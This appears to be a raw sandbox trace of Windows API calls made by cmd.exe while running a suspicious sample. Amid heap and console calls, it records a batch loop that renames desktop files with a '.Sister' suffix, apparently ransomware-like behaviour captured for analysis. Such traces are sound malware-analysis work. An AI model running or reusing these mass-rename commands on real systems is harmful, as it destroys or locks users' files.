RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c758d0) returned 0x130 [0159.781] malloc (_Size=0xffce) returned 0x21ed921fd40 [0159.781] ??_V@YAXPEAX@Z () returned 0x21ed921fd40 [0159.781] GetProcessHeap () returned 0x21ed8c70000 [0159.781] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d65700 [0159.781] GetProcessHeap () returned 0x21ed8c70000 [0159.781] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9374e10 [0159.781] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0159.781] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0159.781] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0159.781] GetLastError () returned 0x2 [0159.781] GetProcessHeap () returned 0x21ed8c70000 [0159.781] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9441420 [0159.781] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9441430 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0159.781] SetErrorMode (uMode=0x0) returned 0x0 [0159.782] SetErrorMode (uMode=0x1) returned 0x0 [0159.782] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed921fd40, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0159.782] SetErrorMode (uMode=0x0) returned 0x1 [0159.782] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0159.782] GetProcessHeap () returned 0x21ed8c70000 [0159.782] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9375a40 [0159.782] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0159.782] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0159.782] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0159.782] GetLastError () returned 0x2 [0159.782] ??_V@YAXPEAX@Z () returned 0x1 [0159.782] malloc (_Size=0xffce) returned 0x21ed921fd40 [0159.782] ??_V@YAXPEAX@Z () returned 0x21ed921fd40 [0159.782] malloc (_Size=0xffce) returned 0x21ed922fd20 [0159.782] ??_V@YAXPEAX@Z () returned 0x21ed922fd20 [0159.783] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0159.783] GetLastError () returned 0x2 [0159.783] _get_osfhandle (_FileHandle=2) returned 0x54 [0159.783] GetFileType (hFile=0x54) returned 0x2 [0159.783] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0159.783] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0159.855] _get_osfhandle (_FileHandle=2) returned 0x54 [0159.855] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0160.005] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0160.006] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0160.006] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0160.193] longjmp () [0160.193] ??_V@YAXPEAX@Z () returned 0x1 [0160.193] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1b28d70, ftCreationTime.dwHighDateTime=0x1d5f026, ftLastAccessTime.dwLowDateTime=0xd43ed340, ftLastAccessTime.dwHighDateTime=0x1d5f098, ftLastWriteTime.dwLowDateTime=0xd43ed340, ftLastWriteTime.dwHighDateTime=0x1d5f098, nFileSizeHigh=0x0, nFileSizeLow=0x12966, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="NbugXFY9poFh8.gif", cAlternateFileName="")) returned 1 [0160.193] GetProcessHeap () returned 0x21ed8c70000 [0160.193] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d646f0, Size=0x312) returned 0x21ed937e450 [0160.193] GetProcessHeap () returned 0x21ed8c70000 [0160.193] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937e450) returned 0x312 [0160.193] GetProcessHeap () returned 0x21ed8c70000 [0160.193] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9451410 [0160.194] GetProcessHeap () returned 0x21ed8c70000 [0160.194] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9451410, Size=0x30) returned 0x21ed9451410 [0160.194] GetProcessHeap () returned 0x21ed8c70000 [0160.194] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9451410) returned 0x30 [0160.194] GetProcessHeap () returned 0x21ed8c70000 [0160.194] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9451450 [0160.194] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0160.195] GetProcessHeap () returned 0x21ed8c70000 [0160.195] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x34) returned 0x21ed8cc89d0 [0160.195] ??_V@YAXPEAX@Z () returned 0x1 [0160.195] GetProcessHeap () returned 0x21ed8c70000 [0160.195] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9451450, Size=0x190) returned 0x21ed9451450 [0160.195] GetProcessHeap () returned 0x21ed8c70000 [0160.195] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9451450) returned 0x190 [0160.195] GetProcessHeap () returned 0x21ed8c70000 [0160.195] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed94515f0 [0160.195] GetProcessHeap () returned 0x21ed8c70000 [0160.195] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed94515f0, Size=0x290) returned 0x21ed94515f0 [0160.195] GetProcessHeap () returned 0x21ed8c70000 [0160.195] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed94515f0) returned 0x290 [0160.195] GetProcessHeap () returned 0x21ed8c70000 [0160.195] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9451890 [0160.195] GetProcessHeap () returned 0x21ed8c70000 [0160.195] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9451890, Size=0x30) returned 0x21ed9451890 [0160.195] GetProcessHeap () returned 0x21ed8c70000 [0160.195] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9451890) returned 0x30 [0160.195] GetProcessHeap () returned 0x21ed8c70000 [0160.195] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed94518d0 [0160.195] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0160.196] GetProcessHeap () returned 0x21ed8c70000 [0160.196] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x34) returned 0x21ed8cc86d0 [0160.196] ??_V@YAXPEAX@Z () returned 0x1 [0160.196] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0160.196] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d65880 [0160.196] FindClose (in: hFindFile=0x21ed8d65880 | out: hFindFile=0x21ed8d65880) returned 1 [0160.196] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d64da0 [0160.196] FindClose (in: hFindFile=0x21ed8d64da0 | out: hFindFile=0x21ed8d64da0) returned 1 [0160.196] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x89066700, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x89066700, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d65760 [0160.196] FindClose (in: hFindFile=0x21ed8d65760 | out: hFindFile=0x21ed8d65760) returned 1 [0160.197] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\NbugXFY9poFh8.gif", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1b28d70, ftCreationTime.dwHighDateTime=0x1d5f026, ftLastAccessTime.dwLowDateTime=0xd43ed340, ftLastAccessTime.dwHighDateTime=0x1d5f098, ftLastWriteTime.dwLowDateTime=0xd43ed340, ftLastWriteTime.dwHighDateTime=0x1d5f098, nFileSizeHigh=0x0, nFileSizeLow=0x12966, dwReserved0=0x4, dwReserved1=0x80, cFileName="NbugXFY9poFh8.gif", cAlternateFileName="NBUGXF~1.GIF")) returned 0x21ed8d65160 [0160.197] FindClose (in: hFindFile=0x21ed8d65160 | out: hFindFile=0x21ed8d65160) returned 1 [0160.197] _wcsnicmp (_String1="NBUGXF~1.GIF", _String2="NbugXFY9poFh8.gif", _MaxCount=0x11) returned 5 [0160.197] malloc (_Size=0x1ff9c) returned 0x21ed9580080 [0160.198] ??_V@YAXPEAX@Z () returned 0x21ed9580080 [0160.199] GetProcessHeap () returned 0x21ed8c70000 [0160.199] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2c) returned 0x21ed8cc8cd0 [0160.199] ??_V@YAXPEAX@Z () returned 0x1 [0160.199] ??_V@YAXPEAX@Z () returned 0x1 [0160.199] GetProcessHeap () returned 0x21ed8c70000 [0160.199] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed94518d0, Size=0x190) returned 0x21ed94518d0 [0160.199] GetProcessHeap () returned 0x21ed8c70000 [0160.199] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed94518d0) returned 0x190 [0160.199] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0160.199] _get_osfhandle (_FileHandle=1) returned 0x50 [0160.199] GetFileType (hFile=0x50) returned 0x2 [0160.199] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0160.199] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0160.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0160.271] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0160.350] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0160.350] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0160.350] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0160.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0160.350] GetFileType (hFile=0x50) returned 0x2 [0160.350] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0160.350] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0160.516] _get_osfhandle (_FileHandle=1) returned 0x50 [0160.516] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0160.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0160.646] GetFileType (hFile=0x50) returned 0x2 [0160.646] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0160.646] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0160.719] _get_osfhandle (_FileHandle=1) returned 0x50 [0160.720] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9451420*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9451420*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0160.798] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"NbugXFY9poFh8.gif\" \"NbugXFY9poFh8.gif.Sister\" ") returned 48 [0160.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0160.798] GetFileType (hFile=0x50) returned 0x2 [0160.798] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0160.798] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0160.902] _get_osfhandle (_FileHandle=1) returned 0x50 [0160.902] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x30, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x30) returned 1 [0160.975] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0160.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0160.975] GetFileType (hFile=0x50) returned 0x2 [0160.975] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0160.975] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0161.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0161.165] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0161.271] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0161.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0161.271] GetFileType (hFile=0x50) returned 0x2 [0161.271] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0161.271] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0161.351] _get_osfhandle (_FileHandle=1) returned 0x50 [0161.351] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0161.476] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0161.476] _get_osfhandle (_FileHandle=1) returned 0x50 [0161.476] GetFileType (hFile=0x50) returned 0x2 [0161.476] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0161.476] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0161.552] _get_osfhandle (_FileHandle=1) returned 0x50 [0161.552] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0161.625] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0161.625] _get_osfhandle (_FileHandle=1) returned 0x50 [0161.625] GetFileType (hFile=0x50) returned 0x2 [0161.625] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0161.625] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0161.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0161.807] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0161.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0161.894] GetFileType (hFile=0x50) returned 0x2 [0161.894] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0161.894] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0161.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0161.971] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed94518a0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed94518a0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0162.153] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"NbugXFY9poFh8.gif.Sister\" \"NbugXFY9poFh8.bat\" ") returned 48 [0162.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.153] GetFileType (hFile=0x50) returned 0x2 [0162.153] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0162.153] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0162.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.238] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x30, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x30) returned 1 [0162.313] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0162.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.313] GetFileType (hFile=0x50) returned 0x2 [0162.313] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0162.313] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0162.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.383] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0162.461] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0162.540] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0162.540] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0162.540] malloc (_Size=0xffce) returned 0x21ed9580080 [0162.540] ??_V@YAXPEAX@Z () returned 0x21ed9580080 [0162.540] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0162.540] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0162.540] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0162.540] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0162.540] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0162.540] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0162.540] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0162.540] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0162.540] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0162.540] ??_V@YAXPEAX@Z () returned 0x1 [0162.540] GetProcessHeap () returned 0x21ed8c70000 [0162.540] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xd0) returned 0x21ed8c75a10 [0162.540] GetProcessHeap () returned 0x21ed8c70000 [0162.540] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c75a10, Size=0x70) returned 0x21ed8c75a10 [0162.541] GetProcessHeap () returned 0x21ed8c70000 [0162.541] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c75a10) returned 0x70 [0162.541] GetProcessHeap () returned 0x21ed8c70000 [0162.541] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x78) returned 0x21ed8d67cb0 [0162.541] GetProcessHeap () returned 0x21ed8c70000 [0162.541] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xd0) returned 0x21ed8d63ae0 [0162.541] GetProcessHeap () returned 0x21ed8c70000 [0162.541] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d63ae0, Size=0x70) returned 0x21ed8d63ae0 [0162.541] GetProcessHeap () returned 0x21ed8c70000 [0162.541] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d63ae0) returned 0x70 [0162.541] malloc (_Size=0xffce) returned 0x21ed9580080 [0162.541] ??_V@YAXPEAX@Z () returned 0x21ed9580080 [0162.541] GetProcessHeap () returned 0x21ed8c70000 [0162.541] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d65880 [0162.541] GetProcessHeap () returned 0x21ed8c70000 [0162.541] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9372710 [0162.541] _wcsicmp (_String1="NbugXFY9poFh8.gif", _String2=".") returned 64 [0162.541] _wcsicmp (_String1="NbugXFY9poFh8.gif", _String2="..") returned 64 [0162.541] GetFileAttributesW (lpFileName="NbugXFY9poFh8.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\nbugxfy9pofh8.gif")) returned 0x20 [0162.542] GetProcessHeap () returned 0x21ed8c70000 [0162.542] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9451a70 [0162.543] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9451a80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0162.543] SetErrorMode (uMode=0x0) returned 0x0 [0162.543] SetErrorMode (uMode=0x1) returned 0x0 [0162.543] GetFullPathNameW (in: lpFileName="NbugXFY9poFh8.gif", nBufferLength=0x7fe7, lpBuffer=0x21ed9580080, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\NbugXFY9poFh8.gif", lpFilePart=0xa6cf4fd660*="NbugXFY9poFh8.gif") returned 0x29 [0162.543] SetErrorMode (uMode=0x0) returned 0x1 [0162.543] GetProcessHeap () returned 0x21ed8c70000 [0162.543] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9374450 [0162.543] _wcsicmp (_String1="NbugXFY9poFh8.gif", _String2=".") returned 64 [0162.543] _wcsicmp (_String1="NbugXFY9poFh8.gif", _String2="..") returned 64 [0162.543] GetFileAttributesW (lpFileName="NbugXFY9poFh8.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\nbugxfy9pofh8.gif")) returned 0x20 [0162.543] ??_V@YAXPEAX@Z () returned 0x1 [0162.543] malloc (_Size=0xffce) returned 0x21ed9580080 [0162.543] ??_V@YAXPEAX@Z () returned 0x21ed9580080 [0162.543] malloc (_Size=0xffce) returned 0x21ed9590060 [0162.543] ??_V@YAXPEAX@Z () returned 0x21ed9590060 [0162.544] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\NbugXFY9poFh8.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\nbugxfy9pofh8.gif")) returned 0x20 [0162.544] malloc (_Size=0xffce) returned 0x21ed923fd00 [0162.544] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0162.544] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\NbugXFY9poFh8.gif", fInfoLevelId=0x1, lpFindFileData=0x21ed9372720, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed9372720) returned 0x21ed8d65460 [0162.544] malloc (_Size=0xffce) returned 0x21ed924fce0 [0162.544] 